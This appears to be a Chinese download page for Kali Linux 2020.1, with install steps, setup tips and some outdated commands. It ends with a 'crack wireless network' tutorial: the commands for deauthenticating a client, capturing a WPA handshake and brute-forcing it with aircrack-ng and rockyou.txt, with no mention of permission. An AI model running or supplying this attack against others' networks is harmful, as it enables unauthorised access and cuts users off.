kali linux (附安装教程)官方最新版v2020.1

kali linux是一个基于Debian的Linux发行版，用于数字取证操作系统，系统中预装了非常多用于渗透测试的软件，完全按照Debian开发标准进行完整重建，采用了全新的目录框架并打包了大量的工具。

软件介绍

kali linux是一款开源免费的操作系统，基于Debian的Linux发行版。改操作系统中安装了非常多的渗透测试工具，并且还拥有开源Git树，让用户能用这款软件做到很多有趣的事情，比如那些想调整或重建包的人可以浏览开发树得到所有源代码，从而可以重建包。

kali linux会对系统中提供的工具进行不断的审查，去掉其中已经无效或功能重复的工具，同时加入有些有趣的新工具，让用户可以有新的内容去进行操作，Kali Linux支持更多的无线设备,能正常运行在各种各样的硬件上。

软件特色

Kali是BackTrack Linux完全遵循Debian开发标准的完整重建.全新的目录框架、复查并打包所有工具、还为VCS建立了Git 树.

集成注入补丁的内核:

作为渗透测试者或开发团队经常需要做无线安全评估.所以的内核包含了最新的注入补丁.

安全的开发环境:

Kali Linux开发团队由一群可信任的人组成,他们只能在使用多种安全协议的时候提交包或管理源.

包和源有GPG签名:

每个开发者都会在编译和提交Kali的包时对它进行签名,并且源也会对它进行签名.

超过300个渗透测试工具:

复查了BackTrack里的每一个工具之后,去掉了一部分已经无效或功能重复的工具.

永久免费:

Kali Linux一如既往的免费.你永远无需为Kali Linux付费.

开源Git树:

是开源软件忠实的拥护者,那些想调整或重建包的人可以浏览开发树得到所有源代码.

遵循FHS:

Kali的开发遵循Linux目录结构标准,用户可以方便的找到命令文件、帮助文件、库文件等..

安装教程

需要注意的是，一般都会直接将Kali安装到虚拟机中，这样方便进行管理操作。直接在虚拟机中找到下载的镜像文件进行安装即可。

点击下载：vmware8免费版

这时候可以进行命名虚拟机以及开始存放文件，最好不要放在C盘，毕竟C盘作为系统盘还是需要重视一下，保不齐哪天飘红运行就卡顿了。

设置好虚拟机磁盘大小并按照提示操作，随后开启虚拟机进行图形化安装。

当然此步开始要选择我们熟悉的中文简体语言，英语好的小伙伴可以选择英文。

按照默认提示进行安装后开始设置账户密码。

安装完成后，大家可以看到非常简约的登录界面，看起来十分舒适。

新手教程

Kali Linux安装之后简单做一设置，让Kali Linux变得更加好用，下面小编为大家带来Kali Linux的新手教程和一些设置方法，让用户们更好的使用该操作系统。

1.更新软件源：

先备份软件源sources.list文件，然后修改sources.list文件，在终端输入：leafpad /etc/apt/sources.list

然后添加以下较快的源：

#中科大 

deb http://mirrors.ustc.edu.cn/kali kali-rolling main non-free contrib

deb-src http://mirrors.ustc.edu.cn/kali kali-rolling main non-free contrib

将新的Kali源粘贴进去，同时将官方源用#号注释掉，然后保存。再到终端更新：

apt-get dist-upgrade 

apt-get update & apt-get upgrade

apt-get clean

当一切更新完之后，想要修改主题该怎么办呢？

首先，需要安装一个主题管理软件（gnome-tweak-tool ），只需要执行：apt-get install gnome-tweak-tool 就可以了。

安装完之后，执行：gnome-tweak-tool 命令进行打开Gnome，我们到http://gnome-look.org 这个网站，选取我们喜欢的主题。下载下来之后，然后解压复制到主题存放的文件夹下：/usr/share/themes ，之后再回到刚才那个gnome-tweak-tool界面，开始各种设置。

2.安装中文输入法

从BackTrack系统开始，一直在用经典的iBus，切换快捷键Ctrl+Space(空格键)，安装命令：

apt-get install ibus ibus-pinyin    #经典的ibus输入法

注：安装完成后需要重启。

3.安装flash player

apt-get install flashplugin-nonfree update-flashplugin-nonfree --install

注：安装完成后需要重启。

4.安装其他一些工具

apt-get install synaptic                   #安装新立得

apt-get install software-center      #安装ubuntu软件中心

apt-get install file-roller                #安装解压缩软件

apt-get install gedit                      #安装gedit编辑软件

apt-get install audacious             #audacious音乐播放器

apt-get install smplayer              #安装smplayer视频播放器

5.安装最新iceweasel，并汉化iceweasel浏览器

Kali Linux 遵循Debian开发标准，系统安装完成后，自带的浏览器iceweasel默认为英文版，介于强迫症，还是做一个简单的汉化吧，在终端输入：

apt-get install iceweasel-l10n-zh-cn

ps：然后关机重启！

如何更新到最新版iceweasel浏览器，首先在软件源中添加：

deb http://mozilla.debian.net/ wheezy-backports iceweasel-release

然后在终端执行以下代码：

apt-get install pkg-mozilla-archive-keyring                    #导入PGP KEY

gpg --check-sigs --fingerprint --keyring /etc/apt/trusted.gpg.d/pkg-mozilla-archive-keyring.gpg --keyring /usr/share/keyrings/debian-keyring.gpg pkg-mozilla-maintainers  #新建钥匙环

apt-get update && apt-get install -t wheezy-backports iceweasel && apt-get install iceweasel-l10n-zh-cn

6、Kali 卸载qq，执行以下命令

dpkg -r qq-for-wine 或 sudo dpkg --purge wine-qq2013-longeneteam

破解无线网

一.打开终端，用airmon-ng命令查看

如果出现无法访问…没有那个文件或目录

解决办法：先在window主机上按win+r键然后输入services.msc

回车

找到VMware USB Arbitration Service，双击

1.启动类型改为自动 …2.启动服务状态 …3.确定

二.打开虚拟机的设置，改成跟下图中2一样（如果为灰色无法更改，则需要关闭kail系统后再改）

将usb无线网卡插在电脑上，（注意：网卡芯片为3070或者8187L，买的时候要注意）

点击 虚拟机 -> 可移动设备 -> 选择那个有WLAN的 -> 连接

三.命令ifconfig查看网卡信息，有wlan0表示连接成功

四.命令airmon-ng start wlan0开启网卡监听模式

五.输入iwconfig命令查看网卡信息， wlan0mon网卡名加了mon则表示成功

六.命令airodump-ng wlan0mon，开始扫描WiFi，按ctrl+c结束任务

BSSID为wifi的MAC地址，PWR为信号强弱程度，数值越小信号越强；#DATA为数据量，越大使用的人就越多，CH为信道频率（频道），ESSID为wifi的名称，中文可能会有乱码

七,接着输入airodump-ng --bssid BSSID -c 信道频率 -w 抓包存储的路径 wlan0mon

如：airodump-ng --bssid BC:5F:6F:3D:03:74 -c 13 -w /home/wifi wlan0mon

数据包已经正在抓取

如果抓取不到数据，新建一个终端：键入airepaly-ng -0 0 -c 连接到WiFi的手机mac地址 -a bssid 网卡名（一般为wlan0mon）

如：aireplay-ng -0 0 -c B8:37:65:94:5D:13 -a BC:5F:6F:3D:03:74 wlan0mon

(0 WiFi设备无限次数,-0 8则攻击8次。攻击原理是：先让设备掉线，设备会再自动连接，并发这个自动连接过程会进行三次握手，会发送tcp包（里面包含加密的密码数据），我方伪装成WiFi热点去窃取该数据包。我方窃取后即可用字典穷举法暴力破解加密的WiFi密码,

数据包里面的密码是哈希加密的，哈希加密只能正向)

出现WPA handshake时，表示抓包成功

两个终端都按Ctrl+c停止，不然那边会一直断网的

cd打开抓包的目录，ls列出来，就看到我们抓到的数据包

八.解压kali自带的字典文件 路径：/usr/share/wordlists/rockyou.txt.gz

如 ：gzip -d/usr/share/wordlists/rockyou.txt.gz

九.键入 aircrack-ng -w 字典路径 握手包路径，回车后开始爆破

如：aircrack-ng -w /usr/share/wordlists/rockyou.txt /home/wifi-0.1.cap

更新日志

默认为非 root

Kali Single 安装程序镜像

Kali NetHunterRootless

主题和 kali-undercover 的改进

新工具